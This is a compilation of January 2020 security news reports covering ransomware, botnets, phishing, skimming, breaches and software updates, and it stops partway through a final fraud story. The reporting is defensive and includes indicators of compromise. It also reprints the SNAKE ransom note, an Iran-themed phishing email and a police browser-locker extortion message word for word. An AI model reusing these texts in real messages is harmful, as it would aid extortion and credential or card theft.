The new guidance advises all Defense Department employees to also "be wary of applications you download, monitor your phones for unusual and unsolicited texts etc., and delete them immediately and uninstall TikTok to circumvent any exposure of personal information."

The Army's decision followed a letter sent by U.S. Senators Chuck Schumer and Tom Cotton in October "to the Acting Director of National Intelligence requesting an assessment of the national security risks posed by TikTok and other China-based content platforms operating in the U.S."

Naval Network Warfare Command user awareness bulletin
Navy/Marine Corps Intranet (NMCI) user awareness bulletin banning TikTok
Schumer also published a statement after Reuters reported that the U.S. government started an investigation on TikTok-owner ByteDance’s acquisition of the U.S. social media app Musical.ly from November 2017 for potential national security risks.

In his statement, Schumer said that the national security probe into TikTok validates the senators' concern that "that apps like TikTok [..] may pose serious risks to millions of Americans and deserve greater scrutiny."

Vanessa Pappas, TikTok US' General Manager responded to these accusations via multiple posts on the company's newsroom saying that TikTok stores "all TikTok US user data in the United States, with backup redundancy in Singapore.

Our data centers are located entirely outside of China, and none of our data is subject to Chinese law," she said in late October.

One month later, Pappas reiterated that "TikTok’s data centers are located entirely outside of China." She also stated that the company has "a dedicated technical team focused on adhering to robust cybersecurity policies, and data privacy and security practices."


SNAKE Ransomware Is the Next Threat Targeting Business Networks
12.1.2020 
Bleepingcomputer  Ransomware

Since network administrators didn't already have enough on their plate, they now have to worry about a new ransomware called SNAKE that is targeting their networks and aiming to encrypt all of the devices connected to it.

Enterprise targeting, or big-game hunting, ransomware are used by threat actors that infiltrate a business network, gather administrator credentials, and then use post-exploitation tools to encrypt the files on all of the computers on the network.

The list of enterprise targeting ransomware is slowly growing and include Ryuk, BitPaymer, DoppelPaymer, Sodinokibi, Maze, MegaCortex, LockerGoga, and now the Snake Ransomware.

What we know about the Snake Ransomware
Snake Ransomware was discovered by MalwareHunterTeam last week who shared it with Vitali Kremez to reverse engineer and learn more about the infection.

Based on the analysis performed by Kremez, this ransomware is written in Golang and contains a much high level of obfuscation than is commonly seen with these types of infections.

"The ransomware contains a level of routine obfuscation not previously and typically seen coupled with the targeted approach," Kremez, Head of SentinelLabs, told BleepingComputer in a conversation.

When started Snake will remove the computer's Shadow Volume Copies and then kill numerous processes related to SCADA systems, virtual machines, industrial control systems, remote management tools, network management software, and more.

It then proceeds to encrypt the files on the device, while skipping any that are located in Windows system folders and various system files. The list of system folders that are skipped can be found below:

windir
SystemDrive
:\$Recycle.Bin
:\ProgramData
:\Users\All Users
:\Program Files
:\Local Settings
:\Boot
:\System Volume Information
:\Recovery
\AppData\
When encrypting a file it will append a ransom 5 character string to the files extension. For example, a file named 1.doc will be encrypted and renamed like 1.docqkWbv.

Folder of Encrypted Files
Folder of Encrypted Files
In each file that is encrypted, the SNAKE Ransomware will append the 'EKANS' file marker shown below. EKANS is SNAKE in reverse.

EKANS File Marker
EKANS File Marker
BleepingComputer has tested many ransomware infections since 2013 and for some reason, it took Snake particularly long time to encrypt our small test box compared to many other ransomware infections. As this is targeted ransomware that is executed at the time of the attacker's choosing, this may not be that much of a problem as the encryption will most likely occur after hours.

When done encrypting the computer, the ransomware will create a ransom note in the C:\Users\Public\Desktop folder named Fix-Your-Files.txt. This ransom note contains instructions to contact a listed email address for payment instructions. This email address is currently bapcocrypt@ctemplar.com.

SNAKE Ransom Note
SNAKE Ransom Note
As you can see from the language in the ransom note, this ransomware specifically targets the entire network rather than individual workstations. They further indicate that any decryptor that is purchased will be for the network and not individual machines, but it is too soon to tell if they would make an exception.

This ransomware is still being analyzed for weaknesses and it is not known if it can be decrypted for free. At this time, though, it looks secure.

IOCs:
Hash:
e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60
Ransom note text:
--------------------------------------------

| What happened to your files?

--------------------------------------------

We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more -

all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry!

You can still get those files back and be up and running again in no time.

---------------------------------------------

| How to contact us to get your files back?

---------------------------------------------

The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network.

Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with

better cyber security in mind. If you are interested in purchasing the decryption tool contact us at bapcocrypt@ctemplar.com

-------------------------------------------------------

| How can you be certain we have the decryption tool?

-------------------------------------------------------

In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets).

We will send them back to you decrypted.
Associated file names:
Fix-Your-Files.txt


Tails 4.2 Fixes Numerous Security Flaws, Improves Direct Upgrades
12.1.2020 
Bleepingcomputer  OS

The Tails Project released a new version of the security-focused Tails Linux distribution and advises users to upgrade as soon as possible to fix multiple security vulnerabilities impacting the previous Tails 4.1.1 version.

Tails (short for The Amnesic Incognito Live System) is a Linux distro focused on guarding its users' anonymity and help them circumvent censorship by forcing all Internet connections through the Tor network.

The new Tails 4.2 version also comes with important improvements to its automatic upgrade feature, new command-line tools for SecureDrop users "to analyze the metadata of leaked documents on computers that cannot use the Additional Software feature", and some additional updates.

Patched security vulnerabilities
Tails 4.2 fixes a long list of security issues affecting multiple components and all users are recommended to upgrade to this new release as soon as possible.

The security vulnerabilities patched in today's release are linked below:

• Tor Browser: Mozilla Foundation Security Advisory 2020-02
• Thunderbird: No MFSA published.
• Linux: CVE-2019-19602, CVE-2019-18811, CVE-2019-18660, CVE-2019-15291, CVE-2019-18683, CVE-2019-15099, CVE-2019-19524, CVE-2019-19051, CVE-2019-19047, CVE-2019-19045, CVE-2019-19534, CVE-2019-19529, CVE-2019-19052
• Cyrus SASL: Debian Security Advisory 4591
• Python ECDSA: Debian Security Advisory 4588
Automatic upgrades to Tails 4.2 are available from the 4.0, 4.1, and 4.1.1 versions, but you should manually upgrade using the following guides "if you cannot do an automatic upgrade or if the system fails to start afterward.

To manually upgrade you can use these guides, provided by the Tails team:

• Windows: https://tails.boum.org/upgrade/win-overview/
• macOS: https://tails.boum.org/upgrade/mac-overview/
• Linux: https://tails.boum.org/upgrade/linux-overview/
Automatic upgrades improvements
The Tails Project enhanced the automatic upgrade feature with the release of Tails 4.2. From now on, you can upgrade from all previous versions to the latest version.

"Until now, if your version of Tails was several months old, you sometimes had to do 2 or more automatic upgrades in a row," the dev team says. "For example, to upgrade from Tails 3.12 to Tails 3.16, you first had to upgrade to Tails 3.14."

In addition, you will only have to do manual upgrades between major Tails versions as is the case when you'll have to upgrade to Tails 5.0 after its next year's release.

"Until now, you could only do a limited number of automatic upgrades, after which you had to do a much more complicated 'manual' upgrade," the developers add.

As a bonus, automatic upgrades now also use less memory and the download sizes have been optimized to make it faster to get updates.

Tails 4.2 also updates the Tor Browser to 9.0.3, the Thunderbird email client to 68.3.0, and the Linux kernel to the 5.3.15 version released on December 5, 2019.

According to the development team, the Tails 4.3 version is scheduled for release on February 11 and it should be a bugfix release.


Microsoft Releases January 2020 Office Updates With Crash Fixes
12.1.2020 
Bleepingcomputer  OS  Vulnerebility

Microsoft released the January 2020 non-security Microsoft Office updates that come with crash and memory leak fixes, as well as performance and stability improvements for Windows Installer (MSI) editions of Office 2016.

For instance, 2020's first series of Microsoft Office non-security updates fix an issue where Microsoft Visio would crash when opening .vsdx files from Microsoft SharePoint, OneDrive, or a web location if the resource's URL contains an ampersand (&) character.

Once you install the Visio 2016 KB4484170 update, you will be able to load any URL again without the app crashing unexpectedly.

This month's updates also patches a memory leak issue affecting Outlook 2016 when toast notifications are enabled with the KB4484212 update.

December 2019 Office non-security updates
The updates released today by Microsoft can be downloaded via the Microsoft Update service or from the Download Center for manual installation.

None of the Microsoft Office updates issued today apply to Office subscription or Office 2016 Click-to-Run editions such as Microsoft Office 365 Home.

The list of updates and the Office product they apply to is available below.

Product Knowledge Base article
Microsoft Office 2016 KB4464586
Microsoft Office 2016 KB4484168
Microsoft Office 2016 KB4484218
Microsoft Outlook 2016 KB4484212
Microsoft PowerPoint 2016 KB4484216
Microsoft Project 2016 KB4484140
Microsoft Visio 2016 KB4464575
Microsoft Visio Viewer 2016 KB2920709
Microsoft Word 2016 KB4484219
Skype for Business 2016 KB4484213
Some updates may require a restart
Before installing the January 2020 non-security Microsoft Office updates, it is important to mention that you may also be required to restart your computer to complete the installation process.

If your Office installation starts misbehaving, you can uninstall the offending update following this step by step procedure:

Go to Start, enter View Installed Updates in the Search Windows box, and then press Enter.
In the list of updates, locate and select the offending update, and then select Uninstall.
Depending on the update, you might also have to install another update for the issue to be fully addressed or the improvement to be enabled on your Windows device, as is the case of the KB4484168 update that requires KB4484216 to also be installed.


Medical Info of Roughly 50K Exposed in Minnesota Hospital Breach
12.1.2020 
Bleepingcomputer  Incindent

The personal and medical information of 49,351 patients was exposed following a security incident involving two employees' email accounts as disclosed by Minnesota-based Alomere Health.

Alomere Health is a community-owned and non-profit general medical and surgical hospital with 127 beds that has been twice named as one of the Top 100 Hospitals by Thompson Reuters.

The Alexandria, Minnesota-based locally-governed hospital started notifying its patients of the security breach incident on January 3, 2020.

Email accounts breached
The security breach was discovered on November 6, 2019, when the hospital staff found that an employee's email account was accessed by at least one unauthorized third party between October 31 and November 1, 2019.

After securing the breached account and starting an investigation with the help of a forensic security outfit, Alomere Health found on November 10 that a second employee's email was breached on November 6.

"The investigation was unable to determine whether the unauthorized person(s) actually viewed any email or attachment in either account," the hospital's breach notification says.

"In an abundance of caution, we reviewed the emails and attachments in the accounts to identify patients whose information may have been accessible to the unauthorized person(s)."

In an abundance of caution, we reviewed the emails and attachments in the accounts to identify patients whose information may have been accessible to the unauthorized person(s). From this review, we determined that portions of some patients’ information were contained in the email accounts. - Alomere Health

Medical and personal information exposed
After reviewing the emails contained within the two breached accounts, the staff discovered that the attackers might have gained access to patients’ names, addresses, dates of birth, as well as medical info such as record numbers, health insurance information, treatment information, and/or diagnosis information.

In addition, for a limited number of patients, Social Security numbers and driver's license numbers might have also been exposed.

Alomere Health offers complimentary credit monitoring and identity protection services for patients whose SSNs and driver license info was stored in the breached email accounts.

The Minnesota-based hospital advises customers who received an email notification regarding this security incident to "review any statements they receive from their health insurers or healthcare providers" and contact them immediately if they discover anything out of place like services that they did not receive being billed.

To lessen the likelihood this occurs in the future, we have put in place additional security measures for all of Alomere Health employee email accounts. It is through these additional layers of security, staff training, and diligence that we will continue to provide high-quality health care, close to home with safety and security. - Alomere Health

Alomere Health is now on a long list of healthcare providers impacted by breaches during the last month, with the Colorado Department of Human Services, Sinai Health System, Cheyenne Regional Medical Center, Children's Hope Alliance, and RiverKids Pediatric Home Health being just a handful of the total number.

The protected health information (PHI) of tens of thousands of patients was exposed just in these five incidents per data breach reports filed with the U.S. Department of Health and Human Services Office for Civil Rights within the last month.

Bleeping Computer has reached out to Alomere Health for additional info but had not heard back at the time of this publication.


Go-Based LiquorBot Adapts Cryptomining Payload to Infected Host
12.1.2020 
Bleepingcomputer  Cryptocurrency

A cryptomining botnet has been attacking unpatched routers since at least May 2019. It exploits a small set of critical vulnerabilities and targets multiple CPU architectures.

Named LiquorBot, the malware is written in Golang (Go) a programming language that has a syntax similar to C but presents some advantages, such as memory safety and garbage collection.

12+ versions in less than a year
Researchers at Bitdefender first saw LiquorBot on May 31, 2019, and tracked its evolution to a version discovered on October 10. Between these dates, 11 releases were identified:

SHA1 Package path First seen
2901d4ee7f289bf0b1a863bec716d751f66a4324 /home/woot/webliquor/ May 31st 2019
1bee367d72c472e5991435479cfdecdf3b6e65db /home/woot/webliquor/ June 4th 2019
2d1d294aac29fab2041949d4cb5c58d3169a31d3 /home/woot/webliquor/ June 7th 2019
b9dd4d230d103b3db458d752d4917466ec1cb9b0 /home/woot/webliquor/ June 10th 2019
31176239ab5187af5d89666f37038340b95a5a4e /home/woot/webliquor/ June 14th 2019
c6d850e264d7d8d6978cd85d69c22b29378e34e4 /home/woot/webliquor/ June 26th 2019
c59dd90f7cefadaa80d9c0113f8af39e4ed0c1a1 /home/woot/liquorv3/ July 24th 2019
8df16857cb914f5eded0249cfde07f1c01697db1 /home/woot/Desktop/GoNet/ Aug 8th 2019
8364c272e0c95ed214c71dbcb48f89c468544bc8 /home/woot/Desktop/ExNet/ Sep 11th 2019
bb07341ab6b203687845ae38cd8c17dfc947e79f /home/woot/Desktop/MineGO/ Sep 13th 2019
331ec23c250b86d912fa34e0e700bfcac1a7c388 /home/woot/Desktop/MineGO/ Sep 30th 2019
63b556a0afcf643337310254cc7f57c729188f36 /home/woot/Desktop/MineGO/ Oct 1st 2019
5821ff8eb9b23035a520e1fb836e43b1ec87ffaf /home/woot/Desktop/MineGO/ Oct 10th 2019
At its core, LiquorBot is a re-implementation of the infamous Mirai but with a cryptocurrency mining feature instead of a distributed denial-of-service (DDoS) component.

It is cross-compiled for ARM, ARM64, x86, x64, and MIPS architectures and the dropper script downloads all the payloads regardless of the CPU architecture.

LiquorBot dropper code
LiquorBot has multiple command and control (C2) servers and communicates with them periodically, reporting vulnerable devices and getting commands:

wpceservice.hldns.ru
ardp.hldns.ru
bpsuck.hldns.ru
Each of the above servers is used interchangeably as a C2 server, for Monero cryptocurrency mining, and for hosting the binaries.

Old bugs and brute-forcing
As for the targets, Bitdefender found that the malware seeks devices vulnerable to CVE-2015-2051, CVE-2016-1555, and CVE-2016-6277. It also uses some command injection (1, 2) and remote command execution flaws in several router models (D-Link, Netgear, and Linksys).

Exploiting these vulnerabilities is not the main compromise method as the malware relies primarily on SSH brute-force attacks that use a dictionary with 82 username/password combinations.

While this method is seen in most versions of LiquorBot, a release from July 24 adds the vulnerability exploits to increase its reach.

It is worth noting that although the malware releases have versions, they do not indicate the evolution of the botnet. The cryptocurrency component was introduced in version 0.2, released in October, while the version from July that adds new propagation methods was labeled 0.6.

LiquorBot is under active development and the authors are likely to further refine it in 2020. Updating your router, if possible, is the easiest way to defend against this sort of threat.

If no longer supported, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators to replace them with alternatives that are still maintained by the vendor.


Microsoft Phishing Scam Exploits Iran Cyberattack Scare
10.1.2020 
Bleepingcomputer  Phishing

An attacker is attempting to take advantage of the recent warnings about possible Iranian cyberattacks by using it as a theme for a phishing attack that tries to collect Microsoft login credentials.

With the rising escalations between the United States and Iran, the U.S. government has been issuing warnings about possible cyberattacks by Iran and potential attacks on critical U.S. infrastructure.

To take advantage of this increased tension, an attacker has created a phishing scam that pretends to be from 'Microsoft MSA' and has an email subject of 'Email users hit by Iran cyber attack' warning that Microsoft's servers were hit by a cyberattack from Iran.

The phishing email goes on to say that in response to this attack, Microsoft was forced to protect their user by locking their email and data on Microsoft's servers. To gain full access again to this locked data, the phishing email says that the recipient must log in again.

Phishing email about Iranian cyberattack on Microsoft Servers
Phishing email about Iranian cyberattack on Microsoft Servers
According to Michael Gillett, who received this phishing scam and shared it with BleepingComputer, it was able to bypass Outlook's spam filters and arrive in the service's inbox.

The full text of this phishing email, which needed a run through a spell checker, can be read below.

Cyber Attack

Microsoft servers have been hit today with an Cyber Attack from Iran Government

For your seifty and security we had to take extra mesures to protect your account and your personal data.

Some emails and files might still be locked on our servers, in order to get full access to your emails and files you have to signin again.

If you still have problems receiveing emails please be patient, our support team is working on this issue and we will fix this as soon as possible.

Restore Data
If a recipient clicks on the 'Restore Data' button, they will be redirected to a phishing landing page that pretends to be a Microsoft log in form. As you can see by the URL, this is not a legitimate Microsoft site.

Microsoft Login Phishing Page
Microsoft Login Phishing Page
If a user enters their login credentials, it will be stolen by the attackers and used for other attacks. These attacks could include targeted phishing scams, credential stuffing attacks, or even data theft.

As always, when receiving strange emails that ask you to log in to perform some task, you should always be suspicious and contact your network or mail administrator.

Furthermore, users should always examine the URLs of any landing pages that contain Microsoft login forms and to remember that legitimate login forms will be on the microsoft.com, live.com, and outlook.com domains.


Firefox 72 Out With Fingerprinter Blocking, Hidden Notification Prompts
10.1.2020 
Bleepingcomputer  Safety

Mozilla has officially released Firefox 72 for Windows, Mac, and Linux and with it comes hidden browser notification prompts and fingerprinter blocking enabled by default in Enhanced Tracking Protection.

Firefox 71 About Page

With the release of Firefox 72, the other development branches of Firefox have also moved up a version. This brings Firefox Beta to version 73 and the Nightly builds to version 74.

You can download Firefox 72 from the following links:

Firefox 72 for Windows 64-bit
Firefox 72 for Windows 32-bit
Firefox 72 for macOS
Firefox 72 for Linux 64-bit
Firefox 72 for Linux 32-bit
Below are the major changes in Firefox 72, but for those who wish to read the full change log, you can do so here.

Enhanced Tracking Protection blocks fingerprinters by default
Firefox 72's Enhanced Tracking Protection will now block known fingerprinter scripts by default.

Fingerprinters are a tracking method that allows a company to track you based on characteristics of your computer rather than through tracking cookies.

With this release, Enhanced Tracking Protection will automatically block these types of tracking scripts under the Standard setting.

"Firefox 72 protects users against fingerprinting by blocking all third-party requests to companies that are known to participate in fingerprinting. This prevents those parties from being able to inspect properties of a user’s device using JavaScript. It also prevents them from receiving information that is revealed through network requests, such as the user’s IP address or the user agent header," Firefox announced in a blog post.

Enhanced Tracking Protection
Enhanced Tracking Protection
Firefox now hides browser notification prompts
One of the more annoying experiences when browsing the web is being shown browser notification subscription prompts that won't go away until you acknowledge them.

Example browser notification prompt
Example browser notification prompt
With Firefox 72, Mozilla will no longer show these notification subscription prompts and will instead display a small chat bubble in the address bar to indicate that the site is offering browser subscriptions.

If a user is interested in subscribing they can click on the chat bubble to see the notification dialog as demonstrated below.

Firefox 72 hiding browser notification prompts
Firefox 72 hiding browser notification prompts
Picture-in-Picture now available for Mac and Linux
With the release of Firefox 71, Mozilla added support for the Picture-in-Picture API, but it was only available to Windows users at that time.

With Firefox 72, this feature is now also available for Mac and Linux users.

Security Improvements
Mozilla's Security Advisories for Firefox page states that this release fixes 11 security vulnerabilities with 5 being classified as 'High', 5 classified as 'Medium', and one as 'Low'.

Of the five 'High' vulnerabilities, four indicate that they could potentially be used by attackers to create specially crafted pages that lead to arbitrary code execution.

Other notable changes or additions
Other notable changes in Firefox 72 include:

Support for blocking images from individual domains has been removed from Firefox, because of low usage and poor user experience.
Enterprise: Experimental support for using client certificates from the OS certificate store can be enabled by setting the preference security.osclientcerts.autoload to true (Windows only).
Developer changes:
Firefox 72 includes the follow improvements for developers:

Debugger Watchpoints let developers observe object property access and writes for easier to track data flow through an application.

Firefox now supports simulation of meta viewport in Responsive Design Mode.


MageCart Attackers Steal Card Info from Focus Camera Shoppers
10.1.2020 
Bleepingcomputer  CyberCrime

The website of popular photography and imaging retailer Focus Camera got hacked late last year by MageCart attackers to inject malicious code that stole customer payment card details.

In true MageCart fashion, the script loaded at checkout to capture billing information and send it to the attacker's server.

Posing as ZenDesk legitimate domain
To hide the malicious traffic, the attackers registered "zdsassets.com," a domain that resembles ZenDesk's legitimate "zdassets.com."

The MageCart domain was registered on November 11, 2019, with a hosting provider in the Netherlands and the thieving script was discovered in late December by Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

When analyzing the breach, Hahad found that the attacker modified a JavaScript file to inject an obfuscated payload. The routine is encoded using base64.

Once decoded, the researcher was able to see the routines executed by the skimming script. The details it stole included email, customer name, address (billing, and shipping), phone number, and card details (number, expiration date, CVV code)

According to DNS telemetry data seen by Hahad, the command and control domain receiving information belonging to Focus Camera customers was resolved 905 times since its creation. This could be indicative of the number of victims.

"It is possible the same C&C domain is being used across multiple compromised shopping sites and campaigns - At this time, we don’t have any telemetry to prove it one way or the other" - Mounir Hahad

In a blog post today, Hahad says that the MageCart script acted when the customer made a purchase as a guest, without having registered.

After determining that the Focus Camera website had been compromised, Juniper Threat Labs tried to contact the site owners. Different timezones and weekends delayed a response from the retailer.

A few days later, the researcher was able to talk to the domain admins and share the findings with them. By the end of the day, the malicious code was removed from the site.


MP Says Austria Unprepared After Cyberattack on Foreign Ministry
10.1.2020 
Bleepingcomputer  BigBrothers

The Austrian State Department's IT systems were under a 'serious attack' suspected to be carried out by a state-backed threat group according to a joint statement from the Foreign Ministry (BMEIA) and the Ministry of the Interior (BMI).

"A coordination committee has been set up on the basis of the Network and Information System Security Act, and all relevant federal agencies are already active," the press release says. "The problem was recognized very quickly and countermeasures were taken immediately."

The attack was disclosed during late Saturday evening and, according to a Foreign Minister Peter Guschelbauer statement quoted by Austrian national public service broadcaster ORF (Österreichischer Rundfunk), it was still active during Sunday.

Austria ill-prepared for such incidents
"The recent and ongoing hacker attack on the Foreign Ministry clearly shows how important cyber defense is and how little Austria is apparently prepared to ward off cyberattacks," Austrian Parliament lower house member Robert Laimer said in a statement.

Laimer, SPÖ's (Social Democratic Party of Austria) regional defense spokesman also added that Austrian's Armed Forces should receive funding for cybersecurity training courses.

This would allow it to intervene and help defend the country's critical infrastructure against future cyberattacks attempting to either cause disruption.

"The fact that the Greens at their federal congress do not see the priorities for the Austrian Armed Forces in the national defense and that airspace security is secondary means that there are worries for the future of the Bundeswehr," said Laimer.

The Austrian Armed Forces urgently need the necessary basic funding to master the protection of critical infrastructure and cyber attacks. - Robert Laimer

Suspected nation-backed cyberattack
"Due to the severity and the nature of the attack, it cannot be ruled out that it is a targeted attack by a state actor," says the joint BMEIA and BMI statement. "The state protection mechanisms provided for this are active at all levels."

This wouldn't be the first time a European country was targeted by a state-sponsored actor seeing that the Russian hacking group tracked as APT28 managed to infiltrate the network of the German Foreign Ministry, Defense Ministry, Chancellery, and the Federal Court of Auditors according to a report from March 2018.

Germany's Federal Ministry of the Interior confirmed the hack, with ministry officials saying that the intrusion was initially detected in December 2017.

German officials also said at the time that an investigation was ongoing trying to determine what systems the hackers infiltrated.

Additionally, based on the evidence already gathered up to that point, the APT28 group had access to the German government network for almost an entire year.

In the past, some European countries have been targeted for similar attacks. Despite all the intensive security measures, there is no 100% protection against cyber attacks. - BMEIA and BMI joint statement

Russian hackers targeting government bodies
APT28 is a Russian cyber-espionage unit also tracked as STRONTIUM, Sofacy, and Fancy Bear, an APT group active since at least January 2007 and previously connected to cyber-espionage campaigns targeting governments and security organizations from all over the world.

The group was behind campaigns such as the Democratic National Committee hack ahead of the 2016 US Presidential Election and attacks on Ministries of Foreign Affairs of the USA and Romania.

A six-month-long cyberattack against the German Parliament that started in 2014 was also attributed to APT28 by Bundestag's director, as were spearphishing attacks targeting NATO and the White House in August 2015 and members of the Bundestag in August 2016, and attempts to hack into the Dutch Ministry of General Affairs in February 2017.

Microsoft said in July 2019 that it alerted around 10,000 of its customers during the last year of either being targeted or compromised by nation-state sponsored hacking groups.

The numbers presented by Redmond reveal the dependence of nation-states on cyber attacks as the means for collection and extracting intelligence, influencing geopolitics, and achieving various other objectives.


Fake Windows 10 Desktop Used in New Police Browser Lock Scam
10.1.2020 
Bleepingcomputer  OS

Scammers have taken an old browser scam and invigorated it using a clever and new tactic that takes advantage of your web browser's full-screen mode to show a fake Windows 10 desktop stating your computer is locked.

This type of scam is called a police browser locker. which pretends to be law enforcement locking your browser because due to illegal activity. These scams then state that if you pay a fine via a credit card, it will unlock your computer so you can use it again.

These types of scams are normally easy to detect as they utilize fake and suspicious URLs and allow you to use other apps on your computer even if the browser is locked.

Overlaying a full-screen Windows 10 Desktop image
To make it harder for users to identify these types of scams, attackers are tricking web users into visiting fake sites that display a full-screen image of a Windows 10 desktop with the Chrome browser open.

These fake Windows 10 desktop images will fill up the entire screen and pretend to display the web site for the country's local police force. As the attackers are just displaying an image, they can also display the legitimate government URL to make it more convincing.

These fake web sites state that the police locked the user's computer for conducting illegal activities such as viewing and disseminating pornographic images of children, zoophilia, and rape. Victims are then prompted to enter their credit card details to pay a fine of approximately $800.

Fake Windows 10 Desktop shown by French browser locker
Fake Windows 10 Desktop shown by French browser locker
When displaying these screens, the scam will show different law enforcement web sites and languages depending on the URL visited or possibly what country you're from.

Malwarebytes who first posted about this new technique saw this scam targeting web users from Qatar, UAE, Oman, Kuwait, and France.

For example, below is some of the text shown in the UAE variant of this scam.

"Your browser has been locked due to viewing and dissemination of materials forbidden by law of [country], namely pornography with pedophilia, rape and zoophilia.

In order to unlocking you should a [amount] [currency] fine with Visa or MasterCard.

Your browser will be unlocked automatically after the fine payment.

Attention! In case of non-payment of the fine, or your attempts to unlock the device independently, case materials will be transferred to [police_force_name] for the institution of criminal proceedings against you due to commitment a crime."

If you enter your credit card details into this form, the attackers will automatically steal the payment information, which will then be sold online at underground criminal forums or used by the attackers for fraudulent purchases.

This tactic makes the scam more convincing
What makes this new variant of the police browser locker so clever is that when the image is shown by the browser in full-screen mode it overlays the entire screen, including the normal Windows 10 desktop.

This could cause users to think that the fake Windows 10 desktop image is their normal desktop. The difference, though, is that clicking on the Start Menu, closing apps, or starting new ones will not work.

What will be usable is an overlaid credit card form, which could make some users think that law enforcement has locked their computer until a fine is paid.

It is important to know that law enforcement will never lock your browser like this and then demand a fine be paid online.

If you ever see a message on your screen like this, press Alt+Tab to see if you can get back to your normal desktop or press Ctrl+Alt+Delete to open the Task Manager and terminate any browser processes.


InfoTrax Gets Slap on The Wrist After Being Breached 20+ Times
10.1.2020 
Bleepingcomputer  Incindent

The Federal Trade Commission (FTC) finalized a settlement with a Utah-based tech company that got hacked and had the personal info of over a million clients stolen following a series of more than 20 undetected network intrusions.

InfoTrax Systems, a provider of back-end operations systems and online distributor of MLM software for the Direct Sales industry, only detected the security breach after "it was alerted that its servers had reached maximum capacity."

The hacker infiltrated InfoTrax’s servers and websites maintained on behalf of the company's clients over 20 times from May 5, 2014, until March 7, 2016, and maintained access to the servers for more than two years per FTC's press release announcing the settlement proposal.

Hacker fills a server with stolen data
InfoTrax was only able to detect the hacker because the archive of stolen data he collected grew so large that one of the servers' hard disks ran out of space.

On March 2, 2016, the threat actor was able to access the sensitive info of roughly one million consumers according to the FTC complaint.

Specifically, the intruder queried certain databases on InfoTrax’s systems from which the intruder accessed personal information of approximately one million consumers, including: full names; physical addresses; email addresses; telephone numbers; SSNs; distributor user IDs and passwords; and admin IDs and passwords. - FTC

To make things even worse, according to the FTC, the company "stored consumers’ personal information [...] in clear, readable text on InfoTrax’s network."

Subsequently, intruders were able to hack InfoTrax's network again on March 14, 2016, and the network of one of its clients on March 29, 2016, in both occasions malicious code being deployed to successfully collect personal and financial information from thousands of victims.

While the total number of consumers InfoTrax stored information on at the time of the hacks, the FTC says that it stored personal info of around 11.8 million individuals as of September 2016.

A second chance to get things right
Per the FTC press release containing the proposed settlement published in November 2019, InfoTrax failed to:

• inventory and delete personal information it no longer needed;
• conduct code review of its software and testing of its network;
• detect malicious file uploads;
• adequately segment its network; and
• implement cybersecurity safeguards to detect unusual activity on its network.

"Service providers like InfoTrax don’t get a pass on protecting sensitive data they handle just because their clients are other businesses rather than individual consumers," Director of the FTC’s Bureau of Consumer Protection Andrew Smith said at the time.

"As this case shows, it’s every company’s responsibility to protect customers’ personal information, especially sensitive data like Social Security numbers."

As part of the finalized settlement with the FTC, the company is prohibited from collecting, selling, sharing, or storing any consumer personal information until it addresses the security issues described in the complaint.

The Utah-based technology company is also required to obtain third-party audits of their new information security program every two years to confirm its capability to protect the security, integrity, and confidentiality of the information stored on InfoTrax's servers.

Privacy is a top priority
InfoTrax also published a press release after the FTC's proposed settlement was issued saying that after discovering the intrusion they "took immediate action to secure the data stored on our servers and to shut down any further unauthorized access."

They reached out to "affected clients and voluntarily requested the support of law enforcement agencies, including the Federal Bureau of Investigation (FBI), to determine the nature and scope of the breach."

The company also signed a consent order detailing the security standards it obliges itself to follow, many of the measures being implemented before the FTC's order.

"We deeply regret that this security incident happened. Information security is critical and integral to our operations, and our clients’ and customers’ security and privacy is our top priority," InfoTrax added.


Nvidia CES Game Ready Driver Adds a Maximum Frame Rate Setting
10.1.2020 
Bleepingcomputer  IT

At CES 2020, Nvidia has released GeForce Game Ready Driver 441.87 and with it comes a few new features, including one that allows you to set a maximum frame rate that will be used by 3D games and applications.

In this release of Nvidia's Game Ready drivers, 'Optimal game settings' have been added for an additional 33 games so that you get the best performance out of your GPU while playing them.

Nvidia has also added a new setting called 'Max Frame Rate' that allows you to cap the frame rate that 3D games and applications are rendered at.

This new feature can be found at NVIDIA Control Panel -> Manage 3D Settings -> Max Frame Rate as shown in the image below.

Set Maximum Frame Rate
Set Maximum Frame Rate
Nvidia states that this feature can be used for a variety of reasons including saving power, reducing system latency, and staying in VRR range and has provided the following method to achieve these results:

Saving Power: Enable Max Frame Rate (NVIDIA Control Panel > 3D Settings > Max Frame Rate) and set your power management mode to “Optimal Power”(NVIDIA Control Panel > 3D Settings > Power Management Mode). While in this mode, GPU frequency is reduced and uses less power. For laptop users, Max Frame Rate also works alongside with Battery Boost and Whisper Mode. If either of these modes are enabled at the same time as Max Frame Rate, the NVIDIA Control Panel will cap the framerate to the lowest of the limits.
Reducing System Latency: Enable Max Frame Rate and set your power management mode to “Prefer maximum performance” to reduce latency. While in this mode, the GPU is kept at higher frequencies to process frames as quickly as possible. To maximize latency reduction in GPU bound scenarios where FPS is consistent, set Max Frame Rate to a framerate slightly below the average FPS and turn Low Latency Mode to Ultra.
Staying in VRR Range: Set the Max Frame Rate slightly below the maximum refresh rate of your display to stay within the Variable Refresh Rate range - providing a no-tear, low system latency experience! For the smoothest, no tear experience, set the low latency mode to Ultra and turn VSYNC on.
Other features in version 441.87
In addition to the Max Frame Rate feature, this driver also introduces a few other features:

Variable Rate Super Sampling (VRSS) is a new feature that improves image quality in Virtual Reality games.
Image Sharpening Improvements allow you toggle the GPU scaling independent of whether Image Sharpening is enabled or not.
Freestyle ‘Splitscreen’ Filter allows gamers to apply filters to only a portion of the screen.
New G-SYNC Compatible Displays
Game Ready for Wolfenstein: Youngblood with Ray Tracing


IT Executive Steals $6 Million, Busted by Word Doc Metadata
10.1.2020 
Bleepingcomputer  CyberCrime

A former corporate executive of a global internet company swindled roughly $6 million between August 2015 and May 2019 using a shell company named Interactive Systems.

48-year old Hicham Kabbaj of Floral Park, New York, pleaded guilty today to one count of wire fraud and faces a maximum sentence of 20 years in prison.

